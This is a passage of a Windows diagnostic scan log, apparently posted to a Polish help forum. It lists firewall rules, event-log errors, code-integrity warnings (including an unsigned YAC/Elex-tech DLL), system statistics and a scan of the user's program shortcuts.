FirewallRules: [{810A60AD-44F4-4F17-9132-22232C1EB2C0}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{7043FAFD-2A69-4C74-AE52-CAB07337CEA0}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{D7797A0C-546C-40A8-A74C-C3136A9DCEC1}] => (Allow) C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{156EBC91-05C9-4005-ABAA-ADD491A4DFF7}] => (Allow) C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{1BAA21A8-62F1-429A-A534-6FB086F6A8CE}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{5572CBD3-1CFB-455F-A0E2-F30F3F62D4F2}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{6543267D-1115-4370-88BA-8201E35D9E99}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{017CF767-CC24-4E73-BBD6-6E7CE50E903B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{901B8B67-32E1-4EF7-88E2-279458BF1BEC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{ACDC2F93-9B31-454B-9D25-60799B38D0C3}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{63DE445A-8D50-45A0-87C4-466E80F0D8DC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{970183A0-20DE-4C83-96BC-24E4E922C0DD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B5C306DD-2D57-4E2F-9637-133F7789618D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{283B4201-DE50-4D62-8CE3-F4E18B6D5894}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{58191D1B-321C-4F84-A3B0-7DB904A1E136}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{2A8FFF8B-D136-4CA3-ABCF-05D170B4D642}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{78B9D49C-ECF2-4D85-B090-3E9A79E801DA}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{4FBCDDD8-C04A-4986-BD2B-DC00A2443DE1}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{A76AF19C-95BD-4659-B2FE-B5E2E23C6E3B}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{E7171E90-6D8C-47E8-9C77-E1BBE2ECB2E0}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{90F8E26B-FFAC-41AA-9EB1-FED13BC6A443}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
FirewallRules: [{3C2C53B6-E8E1-4E28-9417-E9EC2D793987}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
FirewallRules: [{53BA646B-5112-43D4-BCA2-DFE1B3F6D2D3}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{9C35B053-0376-4B18-BE87-98ECC0964784}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5885212C-9E2A-436F-BD66-E0DBFB01798E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4E38067E-4FEA-487B-9F1D-EFAAB159EA77}] => (Allow) C:\Users\Emil\AppData\Local\Programs\Opera\44.0.2510.23876\opera.exe

==================== Punkty Przywracania systemu =========================

UWAGA: Przywracanie systemu jest wyłączone

==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (04/24/2017 01:45:13 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App nie powiodła się. Błąd: -2147023170. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/24/2017 01:45:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: BackgroundTaskHost.exe, wersja: 10.0.14393.0, sygnatura czasowa: 0x57899bb2
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.14393.1066, sygnatura czasowa: 0x58d9ef32
Kod wyjątku: 0x00000004
Przesunięcie błędu: 0x0000000000033c58
Identyfikator procesu powodującego błąd: 0x30c4
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bcf0386541b8
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\System32\BackgroundTaskHost.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\KERNELBASE.dll
Identyfikator raportu: c212378d-f7fe-40ee-bf7e-a0e3a22f0ee9
Pełna nazwa pakietu powodującego błąd: Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/24/2017 12:34:23 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Nie powiodło się wykonanie procedury otwierania dla usługi „BITS” w bibliotece DLL „C:\Windows\System32\bitsperf.dll”. Dane wydajności dla tej usługi nie będą dostępne. Pierwsze cztery bajty (DWORD) sekcji danych Data zawierają kod błędu.

Error: (04/24/2017 12:26:48 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (04/24/2017 12:25:18 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App nie powiodła się. Błąd: -2147023170. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/24/2017 12:25:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: BackgroundTaskHost.exe, wersja: 10.0.14393.0, sygnatura czasowa: 0x57899bb2
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.14393.1066, sygnatura czasowa: 0x58d9ef32
Kod wyjątku: 0x00000004
Przesunięcie błędu: 0x0000000000033c58
Identyfikator procesu powodującego błąd: 0x1154
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bce5102dfa73
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\System32\BackgroundTaskHost.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\KERNELBASE.dll
Identyfikator raportu: fb89236a-c62a-44d5-ab25-87f1f21475f4
Pełna nazwa pakietu powodującego błąd: Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/24/2017 12:22:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: ShellExperienceHost.exe, wersja: 10.0.14393.447, sygnatura czasowa: 0x5819bf85
Nazwa modułu powodującego błąd: JumpViewUI.dll, wersja: 10.0.14393.953, sygnatura czasowa: 0x58ba5925
Kod wyjątku: 0xc0000409
Przesunięcie błędu: 0x0000000000018cdc
Identyfikator procesu powodującego błąd: 0x1334
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bce45da0aa75
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Ścieżka modułu powodującego błąd: C:\Windows\ShellExperiences\JumpViewUI.dll
Identyfikator raportu: 0fadcaaf-a244-46d1-84de-01875a95bb95
Pełna nazwa pakietu powodującego błąd: Microsoft.Windows.ShellExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/24/2017 12:18:04 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 nie powiodła się. Błąd: -2144927141. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/24/2017 12:17:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: NvStreamUserAgent.exe, wersja: 7.1.2084.9592, sygnatura czasowa: 0x57605c64
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 10.0.14393.479, sygnatura czasowa: 0x5825887f
Kod wyjątku: 0xc0000005
Przesunięcie błędu: 0x0000000000030bdd
Identyfikator procesu powodującego błąd: 0x3180
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bce3fadc7047
Ścieżka aplikacji powodującej błąd: C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\SYSTEM32\ntdll.dll
Identyfikator raportu: dc789f86-1640-4db3-b368-c0d9c797dee9
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/24/2017 12:17:28 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.Windows.Photos_8wekyb3d8bbwe!App nie powiodła się. Błąd: -2144927141. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.


Dziennik System:
=============
Error: (04/24/2017 01:43:57 PM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-PH67M221)
Description: Zgodnie z ustawieniami uprawnienia domyślne ustawienia komputera nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
i identyfikatorem aplikacji APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
użytkownikowi LAPTOP-PH67M221\Emil o identyfikatorze zabezpieczeń SID (S-1-5-21-2400838556-3398951076-1685541893-1001) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy (S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/24/2017 01:42:50 PM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-PH67M221)
Description: Zgodnie z ustawieniami uprawnienia domyślne ustawienia komputera nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
i identyfikatorem aplikacji APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
użytkownikowi LAPTOP-PH67M221\Emil o identyfikatorze zabezpieczeń SID (S-1-5-21-2400838556-3398951076-1685541893-1001) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy (S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/24/2017 01:40:32 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
i identyfikatorem aplikacji APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/24/2017 01:38:40 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-PH67M221)
Description: Serwer {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} nie zarejestrował się w modelu DCOM w wymaganym czasie.

Error: (04/24/2017 01:38:39 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
i identyfikatorem aplikacji APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/24/2017 01:37:47 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT)
Description: Serwer {8F2BC96B-68C5-40E8-9CE1-368E3ACAC09B} nie zarejestrował się w modelu DCOM w wymaganym czasie.

Error: (04/24/2017 01:35:47 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT)
Description: Serwer {ECC2E0CA-E42A-4DCB-ABE9-40A4E87D484A} nie zarejestrował się w modelu DCOM w wymaganym czasie.

Error: (04/24/2017 01:33:47 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT)
Description: Serwer {8F2BC96B-68C5-40E8-9CE1-368E3ACAC09B} nie zarejestrował się w modelu DCOM w wymaganym czasie.

Error: (04/24/2017 01:31:47 PM) (Source: DCOM) (EventID: 10010) (User: ZARZĄDZANIE NT)
Description: Serwer {ECC2E0CA-E42A-4DCB-ABE9-40A4E87D484A} nie zarejestrował się w modelu DCOM w wymaganym czasie.

Error: (04/24/2017 01:29:47 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-PH67M221)
Description: Serwer {8F2BC96B-68C5-40E8-9CE1-368E3ACAC09B} nie zarejestrował się w modelu DCOM w wymaganym czasie.


CodeIntegrity:
===================================
  Date: 2017-04-20 12:44:02.581
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-04-19 20:40:46.218
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-04-19 18:41:28.827
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-04-19 18:18:25.330
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-19 17:32:36.654
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 15:02:54.329
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 11:40:53.160
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-18 11:00:34.184
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-17 18:38:41.937
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-14 15:06:23.049
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i3-5005U CPU @ 2.00GHz
Procent pamięci w użyciu: 60%
Całkowita pamięć fizyczna: 4010.45 MB
Dostępna pamięć fizyczna: 1598.58 MB
Całkowita pamięć wirtualna: 4714.45 MB
Dostępna pamięć wirtualna: 1633.04 MB

==================== Dyski ================================

Drive c: (Acer) (Fixed) (Total:930.4 GB) (Free:791.08 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 06CA8F95)

Partition: GPT.

==================== Koniec  Addition.txt ============================


Shortcut
Kod: Zaznacz wszystko
Rezultat skanowania skrótów użytkowników (x64) Wersja: 23-04-2017 01
Uruchomiony przez Emil (24-04-2017 13:47:03)
Uruchomiony z C:\Users\Emil\Downloads
Tryb startu: Normal

==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)





Shortcut: C:\ProgramData\{E4FEB43E-F69B-4D80-8F7F-D58114A44D4B}\DashlaneUpgradeInstaller.lnk ->
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\01 - File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\03 - Documents.lnk -> C:\Users\Emil\Documents ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\04 - Downloads.lnk -> C:\Users\Emil\Downloads ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\05 - Music.lnk -> C:\Users\Emil\Music ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\06 - Pictures.lnk -> C:\Users\Emil\Pictures ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\07 - Videos.lnk -> C:\Users\Emil\Videos ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\08 - Homegroup.lnk -> Microsoft.Windows.Homegroup
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\09 - Network.lnk -> Microsoft.Windows.Network
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu Places\10 - UserProfile.lnk -> C:\Users\Emil ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk -> C:\Windows\Installer\{AC76BA86-7AD7-1045-7B44-A95000000001}\SC_Reader.ico ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AmazonAssistant.lnk -> C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantTaskbar.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Farming Simulator 17.lnk -> C:\Program Files\Farming Simulator 17\x64\FarmingSimulator2017Game.exe (GIANTS Software GmbH)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk -> C:\Windows\MiracastView\MiracastView.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk -> C:\Windows\PrintDialog\PrintDialog.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\MSPUB.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Sims 4.lnk -> C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe (Electronic Arts Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Co nowego w ostatniej wersji.lnk -> C:\Program Files\WinRAR\CoNowego.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Pomoc WinRARa.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Windows Defender.lnk -> C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Manual.lnk -> C:\sylenthhh\Sylenth1\Manual-English.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Uninstall Sylenth1.lnk -> C:\sylenthhh\Sylenth1\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1\Visit LennarDigital.lnk -> C:\sylenthhh\Sylenth1\LennarDigital.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\ScreenShot.lnk -> C:\Program Files (x86)\ScreenShot\ScreenShot.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot\SSInst.lnk -> C:\Program Files (x86)\ScreenShot\SSInst.exe (Filseclab Corporation Limited)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Deinstalacja programu Farm Expert 2017.lnk -> C:\Program Files (x86)\Farm Expert 2017\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Farm Expert 2017 Editor.lnk -> C:\Program Files (x86)\Farm Expert 2017\ar_edytor.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Farm Expert 2017.lnk -> C:\Program Files (x86)\Farm Expert 2017\FE2017.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlayWay SA\Farm Expert 2017\Uninstall Farm Expert 2017.lnk -> C:\Windows\System32 ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Narzędzia pakietu Microsoft Office 2016\Preferencje językowe pakietu Office 2016.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\My Connection\Deinstalacja programu  My Connection.lnk -> C:\Program Files (x86)\My Connection\uninst\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\My Connection\My Connection.lnk -> C:\Program Files (x86)\My Connection\Maincontroller.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes\Uninstall Malwarebytes.lnk -> C:\Program Files\Malwarebytes\Anti-Malware\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk -> C:\FL Studio 12.4.2\FL.exe (Image-Line)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line\More....lnk -> C:\Program Files (x86)\Image-Line\Shared\Start ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emergency 2017\Emergency 2017.lnk -> C:\Program Files (x86)\Emergency 2017\bin\em5_launcher.exe (Sixteen Tons Entertainment)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emergency 2017\Uninstall Emergency 2017.lnk -> C:\Program Files (x86)\Emergency 2017\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DLL-Files.com Client\Client.lnk -> C:\Program Files (x86)\DLL-Files.com Client\DLLFilesClient.exe (DLL-files.com)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DLL-Files.com Client\Deinstalacja programu Client.lnk -> C:\Program Files (x86)\DLL-Files.com Client\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 12\CyberLink PowerDVD 12.lnk -> C:\Program Files (x86)\CyberLink\PowerDVD12\PDVDLP.exe (CyberLink Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6 (32-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\cheatengine-i386.exe (Cheat Engine)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6 (64-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\cheatengine-x86_64.exe (Cheat Engine)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine 6.6.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Cheat Engine.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine help.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\CheatEngine.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine tutorial (64-bit).lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Tutorial-x86_64.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Cheat Engine tutorial.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Tutorial-i386.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Reset settings.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\ceregreset.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Uninstall Cheat Engine.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6\Kernel stuff\Unload kernel module.lnk -> C:\Program Files (x86)\Cheat Engine 6.6\Kernelmoduleunloader.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\BitComet.lnk -> C:\Program Files\BitComet\BitComet.exe (www.BitComet.com)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitComet (64-bit)\HomePage.lnk -> C:\Program Files\BitComet\BitComet.url ()
